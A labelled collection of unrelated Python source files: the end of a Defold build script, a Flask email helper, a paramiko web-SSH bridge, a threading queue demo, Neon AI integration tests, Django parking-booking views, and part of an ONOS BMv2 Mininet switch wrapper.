raise Exception('Unsupported url %s' % (url))
def wait_uploads(self):
for f in self.futures:
f()
self.futures = []
def _form_env(self):
env = dict(os.environ)
host = self.host2
if 'x86-' in host:
host = self.host
ld_library_path = 'DYLD_LIBRARY_PATH' if self.host == 'darwin' else 'LD_LIBRARY_PATH'
ld_library_paths = ['%s/lib/%s' % (self.dynamo_home, self.target_platform),
'%s/ext/lib/%s' % (self.dynamo_home, self.host)]
if self.host == 'x86_64-linux':
ld_library_paths.append('%s/ext/SDKs/linux/%s/%s/lib' % (self.dynamo_home, PACKAGES_LINUX_CLANG, PACKAGES_TAPI_VERSION))
env[ld_library_path] = os.path.pathsep.join(ld_library_paths)
pythonpaths = ['%s/lib/python' % self.dynamo_home,
'%s/build_tools' % self.defold,
'%s/ext/lib/python' % self.dynamo_home]
env['PYTHONPATH'] = os.path.pathsep.join(pythonpaths)
env['DYNAMO_HOME'] = self.dynamo_home
env['ANDROID_HOME'] = os.path.join(self.dynamo_home, 'ext', 'SDKs', 'android-sdk')
go_root = '%s/ext/go/%s/go' % (self.dynamo_home, self.target_platform)
android_host = self.host
if 'win32' in android_host:
android_host = 'windows'
paths = os.path.pathsep.join(['%s/bin/%s' % (self.dynamo_home, self.target_platform),
'%s/bin' % (self.dynamo_home),
'%s/ext/bin' % self.dynamo_home,
'%s/ext/bin/%s' % (self.dynamo_home, host),
'%s/bin' % go_root,
'%s/platform-tools' % env['ANDROID_HOME'],
'%s/ext/SDKs/%s/toolchains/llvm/prebuilt/%s-x86_64/bin' % (self.dynamo_home,PACKAGES_ANDROID_NDK,android_host)])
env['PATH'] = paths + os.path.pathsep + env['PATH']
go_paths = os.path.pathsep.join(['%s/go' % self.dynamo_home,
join(self.defold, 'go')])
env['GOPATH'] = go_paths
env['GOROOT'] = go_root
env['MAVEN_OPTS'] = '-Xms256m -Xmx700m -XX:MaxPermSize=1024m'
# Force 32-bit python 2.7 on darwin.
env['VERSIONER_PYTHON_PREFER_32_BIT'] = 'yes'
env['VERSIONER_PYTHON_VERSION'] = '2.7'
if self.no_colors:
env['NOCOLOR'] = '1'
env['EMSCRIPTEN'] = self._form_ems_path()
env['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache')
env['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten')
xhr2_path = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR, 'xhr2', 'package', 'lib')
if 'NODE_PATH' in env:
env['NODE_PATH'] = xhr2_path + os.path.pathsep + env['NODE_PATH']
else:
env['NODE_PATH'] = xhr2_path
return env
if __name__ == '__main__':
boto_path = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../packages/boto-2.28.0-py2.7.egg'))
sys.path.insert(0, boto_path)
usage = '''usage: %prog [options] command(s)
Commands:
distclean - Removes the DYNAMO_HOME folder
install_ext - Install external packages
install_ems - Install emscripten sdk
sync_archive - Sync engine artifacts from S3
activate_ems - Used when changing to a branch that uses a different version of emscripten SDK (resets ~/.emscripten)
build_engine - Build engine
archive_engine - Archive engine (including builtins) to path specified with --archive-path
install_go - Install go dev tools
build_go - Build go code
archive_go - Archive go binaries
build_editor2 - Build editor
sign_editor2 - Sign editor
bundle_editor2 - Bundle editor (zip)
archive_editor2 - Archive editor to path specified with --archive-path
download_editor2 - Download editor bundle (zip)
notarize_editor2 - Notarize the macOS version of the editor
build_bob - Build bob with native libraries included for cross platform deployment
archive_bob - Archive bob to path specified with --archive-path
build_docs - Build documentation
build_builtins - Build builtin content archive
bump - Bump version number
release - Release editor
shell - Start development shell
smoke_test - Test editor and engine in combination
local_smoke - Test run smoke test using local dev environment
Multiple commands can be specified
To pass on arbitrary options to waf: build.py OPTIONS COMMANDS -- WAF_OPTIONS
'''
parser = optparse.OptionParser(usage)
parser.add_option('--platform', dest='target_platform',
default = None,
choices = get_target_platforms(),
help = 'Target platform')
parser.add_option('--skip-tests', dest='skip_tests',
action = 'store_true',
default = False,
help = 'Skip unit-tests. Default is false')
parser.add_option('--skip-codesign', dest='skip_codesign',
action = 'store_true',
default = False,
help = 'skip code signing (engine and editor). Default is false')
parser.add_option('--skip-docs', dest='skip_docs',
action = 'store_true',
default = False,
help = 'skip building docs when building the engine. Default is false')
parser.add_option('--skip-builtins', dest='skip_builtins',
action = 'store_true',
default = False,
help = 'skip building builtins when building the engine. Default is false')
parser.add_option('--skip-bob-light', dest='skip_bob_light',
action = 'store_true',
default = False,
help = 'skip building bob-light when building the engine. Default is false')
parser.add_option('--disable-ccache', dest='disable_ccache',
action = 'store_true',
default = False,
help = 'force disable of ccache. Default is false')
parser.add_option('--no-colors', dest='no_colors',
action = 'store_true',
default = False,
help = 'No color output. Default is color output')
default_archive_path = CDN_UPLOAD_URL
parser.add_option('--archive-path', dest='archive_path',
default = default_archive_path,
help = 'Archive build. Set ssh-path, host:path, to archive build to. Default is %s' % default_archive_path)
default_package_path = CDN_PACKAGES_URL
parser.add_option('--package-path', dest='package_path',
default = default_package_path,
help = 'Either an url to a file server where the sdk packages are located, or a path to a local folder. Reads $DM_PACKAGES_URL. Default is %s.' % default_package_path)
parser.add_option('--set-version', dest='set_version',
default = None,
help = 'Set version explicitily when bumping version')
parser.add_option('--channel', dest='channel',
default = 'stable',
help = 'Editor release channel (stable, beta, ...)')
parser.add_option('--engine-artifacts', dest='engine_artifacts',
default = 'auto',
help = 'What engine version to bundle the Editor with (auto, dynamo-home, archived, archived-stable or a SHA1)')
parser.add_option('--save-env-path', dest='save_env_path',
default = None,
help = 'Save environment variables to a file')
parser.add_option('--notarization-username', dest='notarization_username',
default = None,
help = 'Username to use when sending the editor for notarization')
parser.add_option('--notarization-password', dest='notarization_password',
default = None,
help = 'Password to use when sending the editor for notarization')
parser.add_option('--notarization-itc-provider', dest='notarization_itc_provider',
default = None,
help = 'Optional iTunes Connect provider to use when sending the editor for notarization')
parser.add_option('--github-token', dest='github_token',
default = None,
help = 'GitHub authentication token when releasing to GitHub')
parser.add_option('--github-target-repo', dest='github_target_repo',
default = release_to_github.get_default_repo(),
help = 'GitHub target repo when releasing artefacts')
parser.add_option('--github-sha1', dest='github_sha1',
default = None,
help = 'A specific sha1 to use in github operations')
parser.add_option('--version', dest='version',
default = None,
help = 'Version to use instead of from VERSION file')
parser.add_option('--codesigning-identity', dest='codesigning_identity',
default = None,
help = 'Codesigning identity for macOS version of the editor')
parser.add_option('--windows-cert', dest='windows_cert',
default = None,
help = 'Path to codesigning certificate for Windows version of the editor')
parser.add_option('--windows-cert-pass', dest='windows_cert_pass',
default = None,
help = 'Password to codesigning certificate for Windows version of the editor')
options, all_args = parser.parse_args()
args = filter(lambda x: x[:2] != '--', all_args)
waf_options = filter(lambda x: x[:2] == '--', all_args)
if len(args) == 0:
parser.error('No command specified')
target_platform = options.target_platform
if not options.target_platform:
target_platform = get_host_platform2()
if 'x86-' in target_platform:
target_platform = get_host_platform() # we need even more cleanup to use "x86-linux" format for everything
c = Configuration(dynamo_home = os.environ.get('DYNAMO_HOME', None),
target_platform = target_platform,
skip_tests = options.skip_tests,
skip_codesign = options.skip_codesign,
skip_docs = options.skip_docs,
skip_builtins = options.skip_builtins,
skip_bob_light = options.skip_bob_light,
disable_ccache = options.disable_ccache,
no_colors = options.no_colors,
archive_path = options.archive_path,
package_path = options.package_path,
set_version = options.set_version,
channel = options.channel,
engine_artifacts = options.engine_artifacts,
waf_options = waf_options,
save_env_path = options.save_env_path,
notarization_username = options.notarization_username,
notarization_password = options.notarization_password,
notarization_itc_provider = options.notarization_itc_provider,
github_token = options.github_token,
github_target_repo = options.github_target_repo,
github_sha1 = options.github_sha1,
version = options.version,
codesigning_identity = options.codesigning_identity,
windows_cert = options.windows_cert,
windows_cert_pass = options.windows_cert_pass)
for cmd in args:
f = getattr(c, cmd, None)
if not f:
parser.error('Unknown command %s' % cmd)
else:
start = time.time()
print("Running '%s'" % cmd)
f()
c.wait_uploads()
duration = (time.time() - start)
print("'%s' completed in %.2f s" % (cmd, duration))
print('Done')
|
email.py | from flask_mail import Message
from app import mail
from flask import render_template
from app import app
# for sending messages in background mode
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[Microblog] Reset Your Password',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token)) |
ssh.py | import paramiko
import socket
import json
from threading import Thread
class SSH:
def __init__(self, websocker, message):
self.websocker = websocker
self.message = message
def connect(self, host, user, password=None, port=22, timeout=30,
term='xterm', pty_width=80, pty_height=24):
try:
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(username=user, password=password, hostname=host, port=port, timeout=timeout)
transport = ssh_client.get_transport()
self.channel = transport.open_session()
self.channel.get_pty(term=term, width=pty_width, height=pty_height)
self.channel.invoke_shell()
for i in range(2):
recv = self.channel.recv(1024).decode('utf-8')
self.websocker.send(recv)
except socket.timeout:
message= 'ssh 连接超时'
self.websocker.send(message)
self.close()
except:
self.close()
def resize_pty(self, cols, rows):
self.channel.resize_pty(width=cols, height=rows)
def django_to_ssh(self, data):
try:
self.channel.send(data)
except:
self.close()
def websocket_to_django(self, data):
self.channel.send(data)
try:
while True:
data = self.channel.recv(1024).decode('utf-8')
if not len(data):
return
self.websocker.send(data)
except:
self.close()
def close(self):
self.message['status'] = 1
self.message['message'] = 'Close Connection'
message = json.dumps(self.message)
self.websocker.send(message)
#self.channel.close()
self.websocker.close()
def shell(self, data):
Thread(target=self.websocket_to_django, args=(data,)).start()
|
priority_queues.py | import queue
import threading
import time
def do_work(item):
print(f'{threading.current_thread()} removed {item} from the queue')
def worker(queue):
while not queue.empty():
item = queue.get()
if item is None:
print('item is none')
break
do_work(item)
queue.task_done()
time.sleep(1)
q = queue.PriorityQueue()
for i in range(5):
q.put((i, i))
for i in range(5):
q.put((i, i))
print('Queue populated')
threads = []
for i in range(2):
thread = threading.Thread(target=worker, args=(q,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
print('Queue is empty')
'''
Queue populated
<Thread(Thread-1, started 123145446420480)> removed (0, 0) from the queue
<Thread(Thread-2, started 123145463209984)> removed (0, 0) from the queue
<Thread(Thread-1, started 123145446420480)> removed (1, 1) from the queue
<Thread(Thread-2, started 123145463209984)> removed (1, 1) from the queue
<Thread(Thread-1, started 123145446420480)> removed (2, 2) from the queue
<Thread(Thread-2, started 123145463209984)> removed (2, 2) from the queue
<Thread(Thread-1, started 123145446420480)> removed (3, 3) from the queue
<Thread(Thread-2, started 123145463209984)> removed (3, 3) from the queue
<Thread(Thread-1, started 123145446420480)> removed (4, 4) from the queue
<Thread(Thread-2, started 123145463209984)> removed (4, 4) from the queue
Queue is empty
'''
|
test_run_neon.py | # # NEON AI (TM) SOFTWARE, Software Development Kit & Application Development System
# # All trademark and other rights reserved by their respective owners
# # Copyright 2008-2021 Neongecko.com Inc.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os.path
import sys
import unittest
import pytest
from time import time, sleep
from multiprocessing import Process
from neon_utils.log_utils import LOG
from mycroft_bus_client import MessageBusClient, Message
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
from neon_core.run_neon import start_neon, stop_neon
AUDIO_FILE_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "audio_files")
class TestRunNeon(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.process = Process(target=start_neon, daemon=False)
cls.process.start()
cls.bus = MessageBusClient()
cls.bus.run_in_thread()
sleep(60) # TODO: Better method to wait for process startup DM
@classmethod
def tearDownClass(cls) -> None:
try:
cls.bus.emit(Message("neon.shutdown"))
cls.bus.close()
cls.process.join(30)
if cls.process.is_alive():
stop = Process(target=stop_neon, daemon=False)
stop.start()
stop.join(60)
cls.process.join(15)
if cls.process.is_alive:
raise ChildProcessError("Process Not Killed!")
except Exception as e:
LOG.error(e)
def setUp(self) -> None:
self.bus.connected_event.wait(30)
while not self.bus.started_running:
sleep(1)
def test_messagebus_connection(self):
from mycroft_bus_client import MessageBusClient
bus = MessageBusClient()
bus.run_in_thread()
self.assertTrue(bus.started_running)
bus.connected_event.wait(10)
self.assertTrue(bus.connected_event.is_set())
bus.close()
def test_speech_module(self):
context = {"client": "tester",
"ident": str(round(time())),
"user": "TestRunner"}
stt_resp = self.bus.wait_for_response(Message("neon.get_stt",
{"audio_file": os.path.join(AUDIO_FILE_PATH, "stop.wav")},
context), context["ident"])
self.assertEqual(stt_resp.context, context)
self.assertIsInstance(stt_resp.data.get("parser_data"), dict)
self.assertIsInstance(stt_resp.data.get("transcripts"), list)
self.assertIn("stop", stt_resp.data.get("transcripts"))
def test_audio_module(self):
text = "This is a test"
context = {"client": "tester",
"ident": str(time()),
"user": "TestRunner"}
tts_resp = self.bus.wait_for_response(Message("neon.get_tts", {"text": text}, context),
context["ident"], timeout=60)
self.assertEqual(tts_resp.context, context)
responses = tts_resp.data
self.assertIsInstance(responses, dict)
self.assertEqual(len(responses), 1)
resp = list(responses.values())[0]
self.assertIsInstance(resp, dict)
self.assertEqual(resp.get("sentence"), text)
# TODO: Define some generic enclosure events to test
# def test_enclosure_module(self):
# resp = self.bus.wait_for_response(Message("mycroft.volume.get"))
# self.assertIsInstance(resp, Message)
# vol = resp.data.get("percent")
# mute = resp.data.get("muted")
#
# self.assertIsInstance(vol, float)
# self.assertIsInstance(mute, bool)
# TODO: Implement transcribe tests when transcribe module is updated
# def test_transcribe_module(self):
# resp = self.bus.wait_for_response(Message("get_transcripts"))
# self.assertIsInstance(resp, Message)
# matches = resp.data.get("transcripts")
# self.assertIsInstance(matches, list)
def test_client_module(self):
resp = self.bus.wait_for_response(Message("neon.client.update_brands"), "neon.server.update_brands.response")
self.assertIsInstance(resp, Message)
data = resp.data
self.assertIsInstance(data["success"], bool)
def test_skills_module(self):
response = self.bus.wait_for_response(Message("skillmanager.list"), "mycroft.skills.list")
self.assertIsInstance(response, Message)
loaded_skills = response.data
self.assertIsInstance(loaded_skills, dict)
# TODO: Test user utterance -> response
if __name__ == '__main__':
unittest.main()
|
views.py | from django.shortcuts import render,redirect
from django.http import HttpResponse
from .models import ParkingInfo,ParkingSpot
from datetime import datetime,timedelta
from django.contrib.auth.models import User,auth
from django.contrib import messages
from django.utils import timezone
from django.utils.timezone import make_aware
from django.core.mail import send_mail
import threading
import time
from django.conf import settings
# Create your views here.
def index(request):
total=ParkingSpot.objects.all().count()
vacant= ParkingSpot.objects.filter(isoccupied=False).count()
return render(request,'index.html',{'total':total,'vacant':vacant,'booked':(total-vacant)})
def home(request):
uid=request.user
hasbooking=ParkingInfo.objects.filter(userid=uid.id,isactive=True)
if hasbooking.exists():
return render(request,'parkinginfo.html',{'vehicleid':hasbooking[0].vehicleid,'slotid':hasbooking[0].slotid.id,'stime':hasbooking[0].stime,'etime':hasbooking[0].etime})
else:
freespots= ParkingSpot.objects.filter(isoccupied=False)
occupiedspots=ParkingInfo.objects.filter(isactive=True)
return render(request,'home.html',{'freespots':freespots,'occupiedspots':occupiedspots})
def book(request):
if request.method=='POST':
slotid=request.POST['slotid']
slot=ParkingSpot.objects.get(id=slotid)
slot.isoccupied=True
slot.save()
uid= request.POST['userid']
userid=User.objects.get(id=uid)
hourss=int(request.POST['hours'])
dateobj=make_aware(datetime.now()) + timedelta(minutes=5) #parking overhead
etimeobj=dateobj+timedelta(hours=hourss)
print(dateobj)
print(etimeobj)
#finaltime=dateobj.strftime("%d/%m/%Y %H:%M:%S")
vehicleid= request.POST['vehicleid']
details=ParkingInfo(userid=userid,slotid=slot,stime=dateobj,etime=etimeobj,vehicleid=vehicleid,isactive=True,notifid=0)
details.save()
return redirect('home')
else:
return redirect('home')
def vacate(request):
if request.method=='POST':
uid =request.user
slotid=request.POST['slotid']
print(slotid)
undoslot=ParkingSpot.objects.get(id=slotid)
undoslot.isoccupied=False
undoslot.save()
undoinfo=ParkingInfo.objects.get(slotid=undoslot,isactive=True)
undoinfo.isactive=False
undoinfo.etime=make_aware(datetime.now())+timedelta(minutes=5)
undoinfo.save()
return redirect('home')
else:
return redirect('home')
def parkhistory(request):
uid=request.user
histry=ParkingInfo.objects.filter(userid=uid).order_by('-id')
return render(request,'uhistory.html',{'histry':histry})
def update(request):
if request.method == 'POST':
uid =request.user
email=request.POST['email1']
if email is None:
messages.info(request,'email field cannot be empty...')
return redirect('update')
match=User.objects.filter(email=email)
print(match)
print(email)
if uid.email==email:
messages.info(request,'email is same')
return redirect('update')
elif match.exists():
messages.info(request,'email taken')
return redirect('update')
else:
updating=User.objects.get(id=uid.id)
updating.email=email
updating.save()
messages.info(request,'contact details were updated successfully...')
return redirect('home')
else:
return render(request,'conupdt.html')
def extendtime(request):
if request.method=='POST':
uid =request.user
slotid=request.POST['slotid']
hourss=int(request.POST['hours'])
print(slotid)
extndslot=ParkingSpot.objects.get(id=slotid)
exinfo=ParkingInfo.objects.get(slotid=extndslot,isactive=True,notifid=0)
exinfo.etime+=timedelta(hours=hourss)
exinfo.save()
messages.info(request,'Time extension accepted.')
return redirect('home')
else:
return redirect('home')
def notifyadmin(sid):
subject ='Regarding Parking spot vacation'
msg= f'User did not vacate spot : {sid} even though duration ended and user was notified. Kindly take appropriate decision.'
to ='iit2019176@iiita.ac.in'
res =send_mail(subject,msg,settings.EMAIL_HOST_USER,[to])
if(res==1):
print('eMail success')
return 0
else:
print('eMail failure')
return 1
def notifyuser(emailid):
subject ='Vacate Parking Spot'
msg= 'Times up! Kindly vacate the parking Spot or Request extension'
to =emailid
res =send_mail(subject,msg,settings.EMAIL_HOST_USER,[to])
if(res==1):
print('eMail success')
return 0
else:
print('eMail failure')
return 1
def checkin():
infolists=ParkingInfo.objects.filter(isactive=True)
for i in infolists:
ltime=i.etime
print('working') #all printfs are for testing purposes.
print(ltime)
print(make_aware(datetime.now()))
nowtime=make_aware(datetime.now())
tdiff=(ltime-nowtime).total_seconds()/60.0
print(nowtime+timedelta(minutes=tdiff)) # just to check time converts from utc to ist correctly
print(tdiff)
if tdiff > 0 and tdiff < 10 and i.notifid == 0:
#user has less than 10 minutes left
print("under 10 minutes")
stat=notifyuser(i.userid.email)
if stat == 0:
obj=ParkingInfo.objects.get(userid=i.userid.id)
obj.notifid=1
obj.save()
elif tdiff < 0 and tdiff < -5 and i.notifid == 1:
#user hasn't vacated yet. inform admin.
print("complain to admin")
stat=notifyadmin(i.slotid.id)
if stat == 0:
obj=ParkingInfo.objects.get(userid=i.userid.id,isactive=True)
obj.notifid=2
obj.save()
def checker():
while True:
checkin()
time.sleep(300)
#obj=ParkingInfo.objects.filter(isactive=True)
#print(obj)
threading.Thread(target=checker,daemon=True).start() #just one extra thread to handle scheduled checkup of expiry timings |
bmv2.py | # coding=utf-8
"""
Copyright 2019-present Open Networking Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import multiprocessing
import os
import random
import re
import socket
import sys
import threading
import time
import urllib2
from contextlib import closing
from mininet.log import info, warn, debug
from mininet.node import Switch, Host
SIMPLE_SWITCH_GRPC = 'simple_switch_grpc'
PKT_BYTES_TO_DUMP = 80
VALGRIND_PREFIX = 'valgrind --leak-check=yes'
SWITCH_START_TIMEOUT = 10 # seconds
BMV2_LOG_LINES = 5
BMV2_DEFAULT_DEVICE_ID = 1
DEFAULT_PIPECONF = "org.onosproject.pipelines.basic"
# Stratum paths relative to stratum repo root
STRATUM_BMV2 = 'stratum_bmv2'
STRATUM_BINARY = '/bazel-bin/stratum/hal/bin/bmv2/' + STRATUM_BMV2
STRATUM_INIT_PIPELINE = '/stratum/hal/bin/bmv2/dummy.json'
def getStratumRoot():
if 'STRATUM_ROOT' not in os.environ:
raise Exception("Env variable STRATUM_ROOT not set")
return os.environ['STRATUM_ROOT']
def parseBoolean(value):
if value in ['1', 1, 'true', 'True']:
return True
else:
return False
def pickUnusedPort():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
addr, port = s.getsockname()
s.close()
return port
def writeToFile(path, value):
with open(path, "w") as f:
f.write(str(value))
def watchDog(sw):
try:
writeToFile(sw.keepaliveFile,
"Remove this file to terminate %s" % sw.name)
while True:
if ONOSBmv2Switch.mininet_exception == 1 \
or not os.path.isfile(sw.keepaliveFile):
sw.killBmv2(log=False)
return
if sw.stopped:
return
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
port = sw.grpcPortInternal if sw.grpcPortInternal else sw.grpcPort
if s.connect_ex(('localhost', port)) == 0:
time.sleep(1)
else:
warn("\n*** WARN: switch %s crashed ☠️, restarting... \n"
% sw.name)
sw.stop()
sw.start()
return
except Exception as e:
warn("*** ERROR: " + e.message)
sw.killBmv2(log=True)
class ONOSHost(Host):
def __init__(self, name, inNamespace=True, **params):
Host.__init__(self, name, inNamespace=inNamespace, **params)
def config(self, **params):
r = super(Host, self).config(**params)
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload %s %s off" \
% (self.defaultIntf(), off)
self.cmd(cmd)
# disable IPv6
self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
return r
class ONOSBmv2Switch(Switch):
"""BMv2 software switch with gRPC server"""
# Shared value used to notify to all instances of this class that a Mininet
# exception occurred. Mininet exception handling doesn't call the stop()
# method, so the mn process would hang after clean-up since Bmv2 would still
# be running.
mininet_exception = multiprocessing.Value('i', 0)
def __init__(self, name, json=None, debugger=False, loglevel="warn",
elogger=False, grpcport=None, cpuport=255, notifications=False,
thriftport=None, netcfg=False, dryrun=False,
pipeconf=DEFAULT_PIPECONF, pktdump=False, valgrind=False,
gnmi=False, portcfg=True, onosdevid=None, stratum=False,
**kwargs):
Switch.__init__(self, name, **kwargs)
self.grpcPort = grpcport
self.grpcPortInternal = None # Needed for Stratum (local_hercules_url)
self.thriftPort = thriftport
self.cpuPort = cpuport
self.json = json
self.useStratum = parseBoolean(stratum)
self.debugger = parseBoolean(debugger)
self.notifications = parseBoolean(notifications)
self.loglevel = loglevel
# Important: Mininet removes all /tmp/*.log files in case of exceptions.
# We want to be able to see the bmv2 log if anything goes wrong, hence
# avoid the .log extension.
self.logfile = '/tmp/bmv2-%s-log' % self.name
self.elogger = parseBoolean(elogger)
self.pktdump = parseBoolean(pktdump)
self.netcfg = parseBoolean(netcfg)
self.dryrun = parseBoolean(dryrun)
self.valgrind = parseBoolean(valgrind)
self.netcfgfile = '/tmp/bmv2-%s-netcfg.json' % self.name
self.chassisConfigFile = '/tmp/bmv2-%s-chassis-config.txt' % self.name
self.pipeconfId = pipeconf
self.injectPorts = parseBoolean(portcfg)
self.withGnmi = parseBoolean(gnmi)
self.longitude = kwargs['longitude'] if 'longitude' in kwargs else None
self.latitude = kwargs['latitude'] if 'latitude' in kwargs else None
if onosdevid is not None and len(onosdevid) > 0:
self.onosDeviceId = onosdevid
else:
self.onosDeviceId = "device:bmv2:%s" % self.name
self.p4DeviceId = BMV2_DEFAULT_DEVICE_ID
self.logfd = None
self.bmv2popen = None
self.stopped = True
# In case of exceptions, mininet removes *.out files from /tmp. We use
# this as a signal to terminate the switch instance (if active).
self.keepaliveFile = '/tmp/bmv2-%s-watchdog.out' % self.name
self.targetName = STRATUM_BMV2 if self.useStratum else SIMPLE_SWITCH_GRPC
self.controllers = None
# Remove files from previous executions
self.cleanupTmpFiles()
def getSourceIp(self, dstIP):
"""
Queries the Linux routing table to get the source IP that can talk with
dstIP, and vice versa.
"""
ipRouteOut = self.cmd('ip route get %s' % dstIP)
r = re.search(r"src (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})", ipRouteOut)
return r.group(1) if r else None
def getDeviceConfig(self, srcIP):
basicCfg = {
"managementAddress": "grpc://%s:%d?device_id=%d" % (
srcIP, self.grpcPort, self.p4DeviceId),
"driver": "stratum-bmv2" if self.useStratum else "bmv2",
"pipeconf": self.pipeconfId
}
if self.longitude and self.latitude:
basicCfg["longitude"] = self.longitude
basicCfg["latitude"] = self.latitude
cfgData = {
"basic": basicCfg
}
if not self.useStratum and self.injectPorts:
portData = {}
portId = 1
for intfName in self.intfNames():
if intfName == 'lo':
continue
portData[str(portId)] = {
"number": portId,
"name": intfName,
"enabled": True,
"removed": False,
"type": "copper",
"speed": 10000
}
portId += 1
cfgData['ports'] = portData
return cfgData
def chassisConfig(self):
config = """description: "BMv2 simple_switch {name}"
chassis {{
platform: PLT_P4_SOFT_SWITCH
name: "{name}"
}}
nodes {{
id: {nodeId}
name: "{name} node {nodeId}"
slot: 1
index: 1
}}\n""".format(name=self.name, nodeId=self.p4DeviceId)
intfNumber = 1
for intfName in self.intfNames():
if intfName == 'lo':
continue
config = config + """singleton_ports {{
id: {intfNumber}
name: "{intfName}"
slot: 1
port: {intfNumber}
channel: 1
speed_bps: 10000000000
config_params {{
admin_state: ADMIN_STATE_ENABLED
}}
node: {nodeId}
}}\n""".format(intfName=intfName, intfNumber=intfNumber,
nodeId=self.p4DeviceId)
intfNumber += 1
return config
def doOnosNetcfg(self, controllerIP):
"""
Notifies ONOS about the new device via Netcfg.
"""
srcIP = self.getSourceIp(controllerIP)
if not srcIP:
warn("*** WARN: unable to get switch IP address, won't do netcfg\n")
return
cfgData = {
"devices": {
self.onosDeviceId: self.getDeviceConfig(srcIP)
}
}
with open(self.netcfgfile, 'w') as fp:
json.dump(cfgData, fp, indent=4)
if not self.netcfg:
# Do not push config to ONOS.
print ""
return
# Build netcfg URL
url = 'http://%s:8181/onos/v1/network/configuration/' % controllerIP
# Instantiate password manager for HTTP auth
pm = urllib2.HTTPPasswordMgrWithDefaultRealm()
pm.add_password(None, url,
os.environ['ONOS_WEB_USER'],
os.environ['ONOS_WEB_PASS'])
urllib2.install_opener(urllib2.build_opener(
urllib2.HTTPBasicAuthHandler(pm)))
# Push config data to controller
req = urllib2.Request(url, json.dumps(cfgData),
{'Content-Type': 'application/json'})
try:
f = urllib2.urlopen(req)
print f.read()
f.close()
except urllib2.URLError as e:
warn("*** WARN: unable to push config to ONOS (%s)\n" % e.reason)
def start(self, controllers=None):
if not self.stopped:
warn("*** %s is already running!\n" % self.name)
return
if controllers is not None:
# If restarting after crash use same controllers as for first
# start.
self.controllers = controllers
# Remove files from previous executions (if we are restarting)
self.cleanupTmpFiles()
if self.grpcPort is None:
self.grpcPort = pickUnusedPort()
writeToFile("/tmp/bmv2-%s-grpc-port" % self.name, self.grpcPort)
if self.thriftPort is None:
self.thriftPort = pickUnusedPort()
writeToFile("/tmp/bmv2-%s-thrift-port" % self.name, self.thriftPort)
if self.useStratum:
config_dir = "/tmp/bmv2-%s-stratum" % self.name
os.mkdir(config_dir)
with open(self.chassisConfigFile, 'w') as fp:
fp.write(self.chassisConfig())
if self.grpcPortInternal is None:
self.grpcPortInternal = pickUnusedPort()
cmdString = self.getStratumCmdString(config_dir)
else:
cmdString = self.getBmv2CmdString()
if self.dryrun:
info("\n*** DRY RUN (not executing %s)\n" % self.targetName)
debug("\n%s\n" % cmdString)
try:
if not self.dryrun:
# Start the switch
self.stopped = False
self.logfd = open(self.logfile, "w")
self.logfd.write(cmdString + "\n\n" + "-" * 80 + "\n\n")
self.logfd.flush()
self.bmv2popen = self.popen(cmdString,
stdout=self.logfd,
stderr=self.logfd)
self.waitBmv2Start()
# We want to be notified if BMv2/Stratum dies...
threading.Thread(target=watchDog, args=[self]).start()
self.doOnosNetcfg(self.controllerIp(self.controllers))
except Exception:
ONOSBmv2Switch.mininet_exception = 1
self.killBmv2()
self.printBmv2Log()
raise
def getBmv2CmdString(self):
bmv2Args = [SIMPLE_SWITCH_GRPC] + self.bmv2Args()
